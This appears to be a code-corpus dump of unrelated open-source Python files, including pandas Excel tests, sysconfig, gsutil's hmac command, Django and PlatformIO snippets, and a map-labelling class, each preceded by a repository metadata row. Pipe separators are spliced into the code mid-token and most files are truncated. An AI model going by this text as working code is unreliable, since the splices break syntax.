sumTbl.cellLbl(browser, benchmarks[-1]))] \
for browser in browsers]
sumTbl.setContents(contents)
return sumTbl
print "Building Results table"
resTbl = buildResultsTable(ws, 7,1, r)
resTbl.put()
if (baseline):
print "Building Summary of the Overhead table"
sumTbl = buildSummaryTable(ws, 8 + resTbl.height(), 1, resTbl, r)
sumTbl.put()
|
cbertinato/pandas | pandas/tests/io/excel/test_writers.py | Python | bsd-3-clause | 47,648 | 0.000021 | from datetime import date, datetime, timedelta
from functools import partial
from io import BytesIO
import os
import numpy as np
from numpy import nan
import pytest
from pandas.compat import PY36
import pandas.util._test_decorators as td
import pandas as pd
from pandas import DataFrame, Index, MultiIndex, get_option, set_option
import pandas.util.testing as tm
from pandas.util.testing import ensure_clean, makeCustomDataframe as mkdf
from pandas.io.excel import (
ExcelFile, ExcelWriter, _OpenpyxlWriter, _XlsxWriter, _XlwtWriter,
register_writer)
@td.skip_if_no('xlrd')
@pytest.mark.parametrize( | "ext", ['.xls', '.xlsx', '.xlsm'])
class TestRoundTrip:
@td.skip_if_no("xlwt")
@td.skip_if_no("openpyxl")
@pytest.mark.parametrize("header,expected", [
(None, DataFrame([np.nan] | * 4)),
(0, DataFrame({"Unnamed: 0": [np.nan] * 3}))
])
def test_read_one_empty_col_no_header(self, ext, header, expected):
# xref gh-12292
filename = "no_header"
df = pd.DataFrame(
[["", 1, 100],
["", 2, 200],
["", 3, 300],
["", 4, 400]]
)
with ensure_clean(ext) as path:
df.to_excel(path, filename, index=False, header=False)
result = pd.read_excel(path, filename, usecols=[0], header=header)
tm.assert_frame_equal(result, expected)
@td.skip_if_no("xlwt")
@td.skip_if_no("openpyxl")
@pytest.mark.parametrize("header,expected", [
(None, DataFrame([0] + [np.nan] * 4)),
(0, DataFrame([np.nan] * 4))
])
def test_read_one_empty_col_with_header(self, ext, header, expected):
filename = "with_header"
df = pd.DataFrame(
[["", 1, 100],
["", 2, 200],
["", 3, 300],
["", 4, 400]]
)
with ensure_clean(ext) as path:
df.to_excel(path, 'with_header', index=False, header=True)
result = pd.read_excel(path, filename, usecols=[0], header=header)
tm.assert_frame_equal(result, expected)
@td.skip_if_no('openpyxl')
@td.skip_if_no('xlwt')
def test_set_column_names_in_parameter(self, ext):
# GH 12870 : pass down column names associated with
# keyword argument names
refdf = pd.DataFrame([[1, 'foo'], [2, 'bar'],
[3, 'baz']], columns=['a', 'b'])
with ensure_clean(ext) as pth:
with ExcelWriter(pth) as writer:
refdf.to_excel(writer, 'Data_no_head',
header=False, index=False)
refdf.to_excel(writer, 'Data_with_head', index=False)
refdf.columns = ['A', 'B']
with ExcelFile(pth) as reader:
xlsdf_no_head = pd.read_excel(reader, 'Data_no_head',
header=None, names=['A', 'B'])
xlsdf_with_head = pd.read_excel(
reader, 'Data_with_head', index_col=None, names=['A', 'B'])
tm.assert_frame_equal(xlsdf_no_head, refdf)
tm.assert_frame_equal(xlsdf_with_head, refdf)
@td.skip_if_no("xlwt")
@td.skip_if_no("openpyxl")
def test_creating_and_reading_multiple_sheets(self, ext):
# see gh-9450
#
# Test reading multiple sheets, from a runtime
# created Excel file with multiple sheets.
def tdf(col_sheet_name):
d, i = [11, 22, 33], [1, 2, 3]
return DataFrame(d, i, columns=[col_sheet_name])
sheets = ["AAA", "BBB", "CCC"]
dfs = [tdf(s) for s in sheets]
dfs = dict(zip(sheets, dfs))
with ensure_clean(ext) as pth:
with ExcelWriter(pth) as ew:
for sheetname, df in dfs.items():
df.to_excel(ew, sheetname)
dfs_returned = pd.read_excel(pth, sheet_name=sheets, index_col=0)
for s in sheets:
tm.assert_frame_equal(dfs[s], dfs_returned[s])
@td.skip_if_no("xlsxwriter")
def test_read_excel_multiindex_empty_level(self, ext):
# see gh-12453
with ensure_clean(ext) as path:
df = DataFrame({
("One", "x"): {0: 1},
("Two", "X"): {0: 3},
("Two", "Y"): {0: 7},
("Zero", ""): {0: 0}
})
expected = DataFrame({
("One", "x"): {0: 1},
("Two", "X"): {0: 3},
("Two", "Y"): {0: 7},
("Zero", "Unnamed: 4_level_1"): {0: 0}
})
df.to_excel(path)
actual = pd.read_excel(path, header=[0, 1], index_col=0)
tm.assert_frame_equal(actual, expected)
df = pd.DataFrame({
("Beg", ""): {0: 0},
("Middle", "x"): {0: 1},
("Tail", "X"): {0: 3},
("Tail", "Y"): {0: 7}
})
expected = pd.DataFrame({
("Beg", "Unnamed: 1_level_1"): {0: 0},
("Middle", "x"): {0: 1},
("Tail", "X"): {0: 3},
("Tail", "Y"): {0: 7}
})
df.to_excel(path)
actual = pd.read_excel(path, header=[0, 1], index_col=0)
tm.assert_frame_equal(actual, expected)
@td.skip_if_no("xlsxwriter")
@pytest.mark.parametrize("c_idx_names", [True, False])
@pytest.mark.parametrize("r_idx_names", [True, False])
@pytest.mark.parametrize("c_idx_levels", [1, 3])
@pytest.mark.parametrize("r_idx_levels", [1, 3])
def test_excel_multindex_roundtrip(self, ext, c_idx_names, r_idx_names,
c_idx_levels, r_idx_levels):
# see gh-4679
with ensure_clean(ext) as pth:
if c_idx_levels == 1 and c_idx_names:
pytest.skip("Column index name cannot be "
"serialized unless it's a MultiIndex")
# Empty name case current read in as
# unnamed levels, not Nones.
check_names = r_idx_names or r_idx_levels <= 1
df = mkdf(5, 5, c_idx_names, r_idx_names,
c_idx_levels, r_idx_levels)
df.to_excel(pth)
act = pd.read_excel(pth, index_col=list(range(r_idx_levels)),
header=list(range(c_idx_levels)))
tm.assert_frame_equal(df, act, check_names=check_names)
df.iloc[0, :] = np.nan
df.to_excel(pth)
act = pd.read_excel(pth, index_col=list(range(r_idx_levels)),
header=list(range(c_idx_levels)))
tm.assert_frame_equal(df, act, check_names=check_names)
df.iloc[-1, :] = np.nan
df.to_excel(pth)
act = pd.read_excel(pth, index_col=list(range(r_idx_levels)),
header=list(range(c_idx_levels)))
tm.assert_frame_equal(df, act, check_names=check_names)
@td.skip_if_no("xlwt")
@td.skip_if_no("openpyxl")
def test_read_excel_parse_dates(self, ext):
# see gh-11544, gh-12051
df = DataFrame(
{"col": [1, 2, 3],
"date_strings": pd.date_range("2012-01-01", periods=3)})
df2 = df.copy()
df2["date_strings"] = df2["date_strings"].dt.strftime("%m/%d/%Y")
with ensure_clean(ext) as pth:
df2.to_excel(pth)
res = pd.read_excel(pth, index_col=0)
tm.assert_frame_equal(df2, res)
res = pd.read_excel(pth, parse_dates=["date_strings"], index_col=0)
tm.assert_frame_equal(df, res)
date_parser = lambda x: pd.datetime.strptime(x, "%m/%d/%Y")
res = pd.read_excel(pth, parse_dates=["date_strings"],
date_parser=date_parser, index_col=0)
tm.assert_frame_equal(df, res)
class _WriterBase:
@pytest.fixture(autouse=True)
def set_engine_and_path(self, request, engine, ext):
"""Fixture to set engine and open file for use in each test case
Rather than requiring `engine=...` to be provided explicitly as an
argument in |
nmercier/linux-cross-gcc | win32/bin/Lib/sysconfig.py | Python | bsd-3-clause | 23,180 | 0.001726 | """Provide access to Python's configuration information.
"""
import sys
import os
from os.path import pardir, realpath
_INSTALL_SCHEMES = {
'posix_prefix': {
'stdlib': '{base}/lib/python{py_version_short}',
'platstdlib': '{platbase}/lib/python{py_version_short}',
'purelib': '{base}/lib/python{py_version_short}/site-packages',
'platlib': '{platbase}/lib/python{py_version_short}/site-packages',
'include': '{base}/include/python{py_version_short}',
'platinclude': '{platbase}/include/python{py_version_short}',
'scripts': '{base}/bin',
'data': '{base}',
},
'posix_home': {
'stdlib': '{base}/lib/python',
'platstdlib': '{base}/lib/python',
'purelib': '{base}/lib/python',
'platlib': '{base}/lib/python',
| 'include': '{base}/include/python',
'platinclude': '{base}/include/python',
'scripts': '{base}/bin',
'data' : '{base}',
},
'nt': {
'stdlib': '{base}/Lib',
'platstdlib': '{base}/Lib',
'purelib': '{base}/Lib/site-packages',
'platlib': '{base}/Lib/site-packages',
'include': '{base}/Include',
'platinclude': '{base}/Include',
'scripts': '{base}/Scripts',
| 'data' : '{base}',
},
'os2': {
'stdlib': '{base}/Lib',
'platstdlib': '{base}/Lib',
'purelib': '{base}/Lib/site-packages',
'platlib': '{base}/Lib/site-packages',
'include': '{base}/Include',
'platinclude': '{base}/Include',
'scripts': '{base}/Scripts',
'data' : '{base}',
},
'os2_home': {
'stdlib': '{userbase}/lib/python{py_version_short}',
'platstdlib': '{userbase}/lib/python{py_version_short}',
'purelib': '{userbase}/lib/python{py_version_short}/site-packages',
'platlib': '{userbase}/lib/python{py_version_short}/site-packages',
'include': '{userbase}/include/python{py_version_short}',
'scripts': '{userbase}/bin',
'data' : '{userbase}',
},
'nt_user': {
'stdlib': '{userbase}/Python{py_version_nodot}',
'platstdlib': '{userbase}/Python{py_version_nodot}',
'purelib': '{userbase}/Python{py_version_nodot}/site-packages',
'platlib': '{userbase}/Python{py_version_nodot}/site-packages',
'include': '{userbase}/Python{py_version_nodot}/Include',
'scripts': '{userbase}/Scripts',
'data' : '{userbase}',
},
'posix_user': {
'stdlib': '{userbase}/lib/python{py_version_short}',
'platstdlib': '{userbase}/lib/python{py_version_short}',
'purelib': '{userbase}/lib/python{py_version_short}/site-packages',
'platlib': '{userbase}/lib/python{py_version_short}/site-packages',
'include': '{userbase}/include/python{py_version_short}',
'scripts': '{userbase}/bin',
'data' : '{userbase}',
},
'osx_framework_user': {
'stdlib': '{userbase}/lib/python',
'platstdlib': '{userbase}/lib/python',
'purelib': '{userbase}/lib/python/site-packages',
'platlib': '{userbase}/lib/python/site-packages',
'include': '{userbase}/include',
'scripts': '{userbase}/bin',
'data' : '{userbase}',
},
}
_SCHEME_KEYS = ('stdlib', 'platstdlib', 'purelib', 'platlib', 'include',
'scripts', 'data')
_PY_VERSION = sys.version.split()[0]
_PY_VERSION_SHORT = sys.version[:3]
_PY_VERSION_SHORT_NO_DOT = _PY_VERSION[0] + _PY_VERSION[2]
_PREFIX = os.path.normpath(sys.prefix)
_EXEC_PREFIX = os.path.normpath(sys.exec_prefix)
_CONFIG_VARS = None
_USER_BASE = None
def _safe_realpath(path):
try:
return realpath(path)
except OSError:
return path
if sys.executable:
_PROJECT_BASE = os.path.dirname(_safe_realpath(sys.executable))
else:
# sys.executable can be empty if argv[0] has been changed and Python is
# unable to retrieve the real program name
_PROJECT_BASE = _safe_realpath(os.getcwd())
if os.name == "nt" and "pcbuild" in _PROJECT_BASE[-8:].lower():
_PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir))
# PC/VS7.1
if os.name == "nt" and "\\pc\\v" in _PROJECT_BASE[-10:].lower():
_PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir, pardir))
# PC/AMD64
if os.name == "nt" and "\\pcbuild\\amd64" in _PROJECT_BASE[-14:].lower():
_PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir, pardir))
# set for cross builds
if "_PYTHON_PROJECT_BASE" in os.environ:
# the build directory for posix builds
_PROJECT_BASE = os.path.normpath(os.path.abspath("."))
def is_python_build():
for fn in ("Setup.dist", "Setup.local"):
if os.path.isfile(os.path.join(_PROJECT_BASE, "Modules", fn)):
return True
return False
_PYTHON_BUILD = is_python_build()
if _PYTHON_BUILD:
for scheme in ('posix_prefix', 'posix_home'):
_INSTALL_SCHEMES[scheme]['include'] = '{projectbase}/Include'
_INSTALL_SCHEMES[scheme]['platinclude'] = '{srcdir}'
def _subst_vars(s, local_vars):
try:
return s.format(**local_vars)
except KeyError:
try:
return s.format(**os.environ)
except KeyError, var:
raise AttributeError('{%s}' % var)
def _extend_dict(target_dict, other_dict):
target_keys = target_dict.keys()
for key, value in other_dict.items():
if key in target_keys:
continue
target_dict[key] = value
def _expand_vars(scheme, vars):
res = {}
if vars is None:
vars = {}
_extend_dict(vars, get_config_vars())
for key, value in _INSTALL_SCHEMES[scheme].items():
if os.name in ('posix', 'nt'):
value = os.path.expanduser(value)
res[key] = os.path.normpath(_subst_vars(value, vars))
return res
def _get_default_scheme():
if os.name == 'posix':
# the default scheme for posix is posix_prefix
return 'posix_prefix'
return os.name
def _getuserbase():
env_base = os.environ.get("PYTHONUSERBASE", None)
def joinuser(*args):
return os.path.expanduser(os.path.join(*args))
# what about 'os2emx', 'riscos' ?
if os.name == "nt":
base = os.environ.get("APPDATA") or "~"
return env_base if env_base else joinuser(base, "Python")
if sys.platform == "darwin":
framework = get_config_var("PYTHONFRAMEWORK")
if framework:
return env_base if env_base else \
joinuser("~", "Library", framework, "%d.%d"
% (sys.version_info[:2]))
return env_base if env_base else joinuser("~", ".local")
def _parse_makefile(filename, vars=None):
"""Parse a Makefile-style file.
A dictionary containing name/value pairs is returned. If an
optional dictionary is passed in as the second argument, it is
used instead of a new dictionary.
"""
import re
# Regexes needed for parsing Makefile (and similar syntaxes,
# like old-style Setup files).
_variable_rx = re.compile("([a-zA-Z][a-zA-Z0-9_]+)\s*=\s*(.*)")
_findvar1_rx = re.compile(r"\$\(([A-Za-z][A-Za-z0-9_]*)\)")
_findvar2_rx = re.compile(r"\${([A-Za-z][A-Za-z0-9_]*)}")
if vars is None:
vars = {}
done = {}
notdone = {}
with open(filename) as f:
lines = f.readlines()
for line in lines:
if line.startswith('#') or line.strip() == '':
continue
m = _variable_rx.match(line)
if m:
n, v = m.group(1, 2)
v = v.strip()
# `$$' is a literal `$' in make
tmpv = v.replace('$$', '')
if "$" in tmpv:
notdone[n] = v
else:
try:
v = int(v)
except ValueError:
# insert literal `$'
|
catapult-project/catapult | third_party/gsutil/gslib/commands/hmac.py | Python | bsd-3-clause | 13,530 | 0.003991 | # -*- coding: utf-8 -*-
# Copyright 2019 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Implementation of HMAC key management command for GCS.
NOTE: Any modification to this file or corresponding HMAC logic
should be submitted in its own PR and release to avoid
concurrency issues in testing.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from gslib.command import Command
from gslib.command_argument import CommandArgument
from gslib.cs_api_map import ApiSelector
from gslib.exception import CommandException
from gslib.help_provider import CreateHelpText
from gslib.metrics import LogCommandParams
from gslib.project_id import PopulateProjectId
from gslib.utils.cloud_api_helper import GetCloudApiInstance
from gslib.utils.text_util import InsistAscii
_CREATE_SYNOPSIS = """
gsutil hmac create [-p <project>] <service_account_email>
"""
_DELETE_SYNOPSIS = """
gsutil hmac delete [-p <project>] <access_id>
"""
_GET_SYNOPSIS = """
gsutil hmac get [-p <project>] <access_id>
"""
_LIST_SYNOPSIS = """
gsutil hmac list [-a] [-l] [-p <project>] [-u <service_account_email>]
"""
_UPDATE_SYNOPSIS = """
gsutil hmac update -s (ACTIVE|INACTIVE) [-e <etag>] [-p <project>] <access_id>
"""
_CREATE_DESCRIPTION = """
<B>CREATE</B>
The ``hmac create`` command creates an HMAC key for the specified service
account:
gsutil hmac create test.service.account@test_project.iam.gserviceaccount.com
The secret key material is only available upon creation, so be sure to store
the returned secret along with the access_id.
<B>CREATE OPTIONS</B>
The ``create`` sub-command has the following option
-p <project_id> Specify a project in which to create a key.
"""
_DELETE_DESCRIPTION = """
<B>DELETE</B>
The ``hmac delete`` command permanently deletes the specified HMAC key:
gsutil hmac dele | te GOOG56JBMFZX6PMPTQ62VD2
Note that keys must be updated to be in the ``INACTIVE`` state before they can be
deleted.
<B>DELETE OPTIONS< | /B>
The "delete" sub-command has the following option
-p <project_id> Specify a project from which to delete a key.
"""
_GET_DESCRIPTION = """
<B>GET</B>
The ``hmac get`` command retrieves the specified HMAC key's metadata:
gsutil hmac get GOOG56JBMFZX6PMPTQ62VD2
Note that there is no option to retrieve a key's secret material after it has
been created.
<B>GET OPTIONS</B>
The ``get`` sub-command has the following option
-p <project_id> Specify a project from which to get a key.
"""
_LIST_DESCRIPTION = """
<B>LIST</B>
The ``hmac list`` command lists the HMAC key metadata for keys in the
specified project. If no project is specified in the command, the default
project is used.
<B>LIST OPTIONS</B>
The ``list`` sub-command has the following options
-a Show all keys, including recently deleted
keys.
-l Use long listing format. Shows each key's full
metadata excluding the secret.
-p <project_id> Specify a project from which to list keys.
-u <service_account_email> Filter keys for a single service account.
"""
_UPDATE_DESCRIPTION = """
<B>UPDATE</B>
The ``hmac update`` command sets the state of the specified key:
gsutil hmac update -s INACTIVE -e M42da= GOOG56JBMFZX6PMPTQ62VD2
Valid state arguments are ``ACTIVE`` and ``INACTIVE``. To set a key to state
``DELETED``, use the ``hmac delete`` command on an ``INACTIVE`` key. If an etag
is set in the command, it will only succeed if the provided etag matches the etag
of the stored key.
<B>UPDATE OPTIONS</B>
The ``update`` sub-command has the following options
-s <ACTIVE|INACTIVE> Sets the state of the specified key to either
``ACTIVE`` or ``INACTIVE``.
-e <etag> If provided, the update will only be performed
if the specified etag matches the etag of the
stored key.
-p <project_id> Specify a project in which to update a key.
"""
_SYNOPSIS = (_CREATE_SYNOPSIS + _DELETE_SYNOPSIS.lstrip('\n') +
_GET_SYNOPSIS.lstrip('\n') + _LIST_SYNOPSIS.lstrip('\n') +
_UPDATE_SYNOPSIS.lstrip('\n') + '\n\n')
_DESCRIPTION = """
You can use the ``hmac`` command to interact with service account `HMAC keys
<https://cloud.google.com/storage/docs/authentication/hmackeys>`_.
The ``hmac`` command has five sub-commands:
""" + '\n'.join([
_CREATE_DESCRIPTION,
_DELETE_DESCRIPTION,
_GET_DESCRIPTION,
_LIST_DESCRIPTION,
_UPDATE_DESCRIPTION,
])
_DETAILED_HELP_TEXT = CreateHelpText(_SYNOPSIS, _DESCRIPTION)
_VALID_UPDATE_STATES = ['INACTIVE', 'ACTIVE']
_TIME_FORMAT = '%a, %d %b %Y %H:%M:%S GMT'
_create_help_text = CreateHelpText(_CREATE_SYNOPSIS, _CREATE_DESCRIPTION)
_delete_help_text = CreateHelpText(_DELETE_SYNOPSIS, _DELETE_DESCRIPTION)
_get_help_text = CreateHelpText(_GET_SYNOPSIS, _GET_DESCRIPTION)
_list_help_text = CreateHelpText(_LIST_SYNOPSIS, _LIST_DESCRIPTION)
_update_help_text = CreateHelpText(_UPDATE_SYNOPSIS, _UPDATE_DESCRIPTION)
def _AccessIdException(command_name, subcommand, synopsis):
return CommandException(
'%s %s requires an Access ID to be specified as the last argument.\n%s' %
(command_name, subcommand, synopsis))
def _KeyMetadataOutput(metadata):
"""Format the key metadata for printing to the console."""
def FormatInfo(name, value, new_line=True):
"""Format the metadata name-value pair into two aligned columns."""
width = 22
info_str = '\t%-*s %s' % (width, name + ':', value)
if new_line:
info_str += '\n'
return info_str
message = 'Access ID %s:\n' % metadata.accessId
message += FormatInfo('State', metadata.state)
message += FormatInfo('Service Account', metadata.serviceAccountEmail)
message += FormatInfo('Project', metadata.projectId)
message += FormatInfo('Time Created',
metadata.timeCreated.strftime(_TIME_FORMAT))
message += FormatInfo('Time Last Updated',
metadata.updated.strftime(_TIME_FORMAT))
message += FormatInfo('Etag', metadata.etag, new_line=False)
return message
class HmacCommand(Command):
"""Implementation of gsutil hmac command."""
command_spec = Command.CreateCommandSpec(
'hmac',
min_args=1,
max_args=8,
supported_sub_args='ae:lp:s:u:',
file_url_ok=True,
urls_start_arg=1,
gs_api_support=[ApiSelector.JSON],
gs_default_api=ApiSelector.JSON,
usage_synopsis=_SYNOPSIS,
argparse_arguments={
'create': [CommandArgument.MakeZeroOrMoreCloudOrFileURLsArgument()],
'delete': [CommandArgument.MakeZeroOrMoreCloudOrFileURLsArgument()],
'get': [CommandArgument.MakeZeroOrMoreCloudOrFileURLsArgument()],
'list': [CommandArgument.MakeZeroOrMoreCloudOrFileURLsArgument()],
'update': [CommandArgument.MakeZeroOrMoreCloudOrFileURLsArgument()],
},
)
help_spec = Command.HelpSpec(
help_name='hmac',
help_name_aliases=[],
help_type='command_help',
help_one_line_summary=('CRUD operations on service account HMAC keys.'),
help_text=_DETAILED_HELP_TEXT,
subcommand_help_text={
'create': _create_help_text,
'delete': _delete_help_text,
'get': _get_help_text,
'list': _list_help_text,
'update': _update_help_text,
})
def _CreateHmacKey(se |
octaflop/django_music | apps/web_app/forms.py | Python | mit | 240 | 0 | from django import forms
class SongForm(forms.Form):
| track = | forms.IntegerField(label='Track', required=False)
title = forms.CharField(label='Title')
duration = forms.CharField(label='Duration', max_length=15, required=False)
|
mangaki/mangaki | mangaki/mangaki/migrations/0081_merge_20170720_1125.py | Python | agpl-3.0 | 350 | 0 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-20 11:25
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('mangaki', '0080_ | auto_20170719_0511'),
('mangaki', '0080_save_studi | o_and_editor_on_work'),
]
operations = [
]
|
platformio/platformio | tests/test_misc.py | Python | apache-2.0 | 1,489 | 0 | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
# |
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under t | he License.
import pytest
import requests
from platformio import exception, util
def test_platformio_cli():
result = util.exec_command(["pio", "--help"])
assert result["returncode"] == 0
assert "Usage: pio [OPTIONS] COMMAND [ARGS]..." in result["out"]
def test_ping_internet_ips():
for host in util.PING_REMOTE_HOSTS:
requests.get("http://%s" % host, allow_redirects=False, timeout=2)
def test_api_internet_offline(without_internet, isolated_pio_home):
with pytest.raises(exception.InternetIsOffline):
util.get_api_result("/stats")
def test_api_cache(monkeypatch, isolated_pio_home):
api_kwargs = {"url": "/stats", "cache_valid": "10s"}
result = util.get_api_result(**api_kwargs)
assert result and "boards" in result
monkeypatch.setattr(util, "_internet_on", lambda: False)
assert util.get_api_result(**api_kwargs) == result
|
tztztztztz/SYMLeaveRequestServer | service/appsetting.py | Python | mit | 528 | 0.001894 | from config import config
class AppSetting(object):
def __init__(self):
self.config = config.config
def get_password(self):
return self.config['app']['auth_password']
def change_password(self, oldpassword, newpassword):
if oldpassword != self.get_password():
| return None, 'password is not correct'
self.set_password(newpassword)
return [], None
def set_password(self, password):
self.config['app']['auth_pa | ssword'] = password
config.save()
|
harinisuresh/yelp-district-clustering | Map.py | Python | mit | 7,068 | 0.009479 | """Module for Map Class"""
from MapUtil | s import Position, Coordinate
from PIL import Image
from PIL import ImageFont, ImageDraw, ImageOps
class Map:
"""Map class for hanlding coordinate conversion and adding labels to map image."""
def __init__(self, top_left_coord, top_right_coord, bottom_left_coord, bottom_right_coord, image_path):
"""
Constructor for Map Object
Parameters:
top_left_coord - Coordinate Object representing the top left corner
top_right_ | coord - Coordinate Object representing the top right corner
bottom_left_coord - Coordinate Object representing the bottom left corner
bottom_right_coord - Coordinate Object representing the bottom right corner
image_path - path of the image of the map
Returns:
A Map object.
"""
self.top_left_coord = top_left_coord
self.top_right_coord = top_right_coord
self.bottom_left_coord = bottom_left_coord
self.bottom_right_coord = bottom_right_coord
self.image = Image.open(image_path)
self.image_path = image_path
def real_width(self):
"""
Get the coordinate width of this map.
Returns:
The coordinate width of this map.
"""
return abs(self.top_left_coord.longitude - self.top_right_coord.longitude)
def real_height(self):
"""
Get the coordinate height of this map.
Returns:
The coordinate height of this map.
"""
return abs(self.top_left_coord.latitude - self.bottom_left_coord.latitude)
def image_width(self):
"""
Get the width of this map's image.
Returns:
The width of this map's image.
"""
return self.image.size[0]
def image_height(self):
"""
Get the height of this map's image.
Returns:
The height of this map's image.
"""
return self.image.size[1]
def world_coordinate_to_image_position(self, coordinate, from_bottom_left=False):
"""
Get the image position corresponding to the world coordinate.
Parameters:
coordinate - Coordinate Object to be transformed
from_bottom_left - Determines if the new coordinate system should be 0 at the bottom left or top left.
Returns:
The image position corresponding to the world coordinate as a Position object.
"""
x_proportion = (coordinate.longitude - self.top_left_coord.longitude)/self.real_width()
y_proportion = (abs(self.top_left_coord.latitude) - abs(coordinate.latitude))/self.real_height()
x = x_proportion * self.image_width()
y = y_proportion * self.image_height()
if from_bottom_left:
y = self.image_height() - y
return Position(x,y)
def add_label_to_image(self, label_text, position=None, coordinate=None, rotated=False, weight = 1.0):
"""
Add a label to the image.
Parameters:
label_text - The text of the label
position - the image position for the label
coordinate - the coordinate position for the label
rotated - If the label should be rotated
weight - Size of the label
Returns:
None
"""
if coordinate == None and position == None:
raise Exception("Coordinate and position can't both be None")
if position == None:
position = self.world_coordinate_to_image_position(coordinate)
draw_txt = ImageDraw.Draw(self.image)
font_size = int(weight*16.0)
position = Map.center_label_pos(position, font_size, label_text, rotated)
font = ImageFont.truetype("fonts/BEBAS___.TTF", font_size)
draw_txt.text((position.x, position.y), label_text, font=font, fill=(0, 0, 0, 255))
@staticmethod
def center_label_pos(img_pos, font_size, label_text, rotated=False):
"""
Get the center of a label from its text and font size.
Parameters:
img_pos - The left-aligned position of the label.
font_size - The font size of the label
label_text - The text of the label
rotated - If the label is rotated
Returns:
The center of a label.
"""
pos = Position(img_pos.x, img_pos.y)
if rotated:
pos.y -= (font_size * len(label_text))/4.0
pos.x -= (font_size)/4.0
else:
pos.x -= (font_size * len(label_text))/4.0
pos.y -= (font_size)/4.0
return pos
@staticmethod
def pheonix():
"""Returns the map object of phoenix"""
imagePath = "images/phoenix.png"
top_latitude = 33.788493
bottom_latitude = 33.129717
left_longitude = -112.412109
right_longitude = -111.622467
return Map(Coordinate(top_latitude,left_longitude), \
Coordinate(top_latitude,right_longitude), Coordinate(bottom_latitude,left_longitude),\
Coordinate(bottom_latitude,right_longitude), imagePath)
@staticmethod
def vegas():
"""Returns the map object of vegas"""
imagePath = "images/vegas.png"
top_latitude = 36.310359
bottom_latitude = 35.980255
left_longitude = -115.357904
right_longitude = -114.949179
return Map(Coordinate(top_latitude,left_longitude), \
Coordinate(top_latitude,right_longitude), Coordinate(bottom_latitude,left_longitude),\
Coordinate(bottom_latitude,right_longitude), imagePath)
@staticmethod
def waterloo():
"""Returns the map object of waterloo"""
imagePath = "images/waterloo.png"
top_latitude = 43.544364
bottom_latitude = 43.410581
left_longitude = -80.635872
right_longitude = -80.451164
return Map(Coordinate(top_latitude,left_longitude), \
Coordinate(top_latitude,right_longitude), Coordinate(bottom_latitude,left_longitude),\
Coordinate(bottom_latitude,right_longitude), imagePath)
@staticmethod
def edinburgh():
"""Returns the map object of edinburgh"""
imagePath = "images/edinburgh.png"
top_latitude = 55.986704
bottom_latitude = 55.907306
left_longitude = -3.251266
right_longitude = -3.121834
return Map(Coordinate(top_latitude,left_longitude), \
Coordinate(top_latitude,right_longitude), Coordinate(bottom_latitude,left_longitude),\
Coordinate(bottom_latitude,right_longitude), imagePath)
@staticmethod
def madison():
"""Returns the map object of madison"""
imagePath = "images/madison.png"
top_latitude = 43.215279
bottom_latitude = 42.960537
left_longitude = -89.573593
right_longitude = -89.223404
return Map(Coordinate(top_latitude,left_longitude), \
Coordinate(top_latitude,right_longitude), Coordinate(bottom_latitude,left_longitude),\
Coordinate(bottom_latitude,right_longitude), imagePath)
|
eeue56/PyGeo2 | pygeo/examples/real/beziercurves.py | Python | gpl-2.0 | 2,623 | 0.032406 | from pygeo import *
explanation ="""Bezier curves are an interesting way to
visually explore issues related to permutations,
since unique curves are created by the same
control points provided in varying sequence to
the curve creation code"""
v=display(title="Bezier Permutations",scale=40,width=600,
axis=False,height=600,explanation=explanation)
# 4 fixed points on the plane of the screen - only 2 coordinate
# arguments given so the z coordinate defaults to 0.
p1 = Point(30,30,level=2);
p2 = Point(-30,30,level=2)
p3 = Point(-30,-30,level=2)
p4 = Point(30,-30,0,level=2);
# 2 additional points, on the z axis.
p5 = Point(0,0,30,level=2);
p6 = Point(0,0,-30,level=2);
#a list of the points created above
L=[p1,p2,p3,p4,p5,p6]
# create a list of the integers (starting at zero)
# equal in numeber to the len of the list of points L
M = range(len(L))
# perform permutation on the list of points, and
# feed each permutation in turn to the BezierCurve
# code as its control points.
def drawcurve(p,size=None,color=(1,.1,.4),lw=.2,level=1):
# P is our list of integer lists - a list with sublists.
# It is set as 'global' because an outside function
# "perms" needs to be able to effect its contents, and
# therefore needs to be know of it.
if not size:
size = len(p)
# We determine the number of control points we want to
# feed BezierCurve. For example if p is a list of
# 6 points, and the size argment is 4, then the perms
# function will return 4 element permutations of the
# the 6 points. The perms function exlcudes permutuations
# where permlist = permlist.reverse, as these would create
# duplications of curves.
P=permsets(p,size)
# th | e actual points are in | L, P is a list of sublists of
# permutated integers. P elements serve as
# indexes which select from the points contained in L.
for i in range(len(P)):
#create a list of points selected acccording to the indexes
#retrieved from the permsets function call
cp=[L[j] for j in P[i]]
# draw the curve based on the ordered set of points given as
# an argument
# toggle drawpoints and drawcurve boolean to see effects
Curve(cp,linewidth=lw,density=25,level=level,color=color)
# select control points we want to start with as
# seeds. We slice and concatenate elements wanted.
drawcurve(M[:1] + M[2:5],level=1)
drawcurve(M[:3] + M[5:6],level=1)
drawcurve(M[:3] + M[4:5],level=2)
drawcurve(M[:1] + M[2:4]+M[5:6],level=2)
# all perms of 3 control points
drawcurve(M,size=3,color=BLUE,level=3)
#display options
v.pickloop() |
DozyDolphin/Worksets | setup.py | Python | gpl-3.0 | 1,774 | 0.000564 | '''
Copyright 2017 Anders Lykke Gade
This file is part of Worksets.
Worksets is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
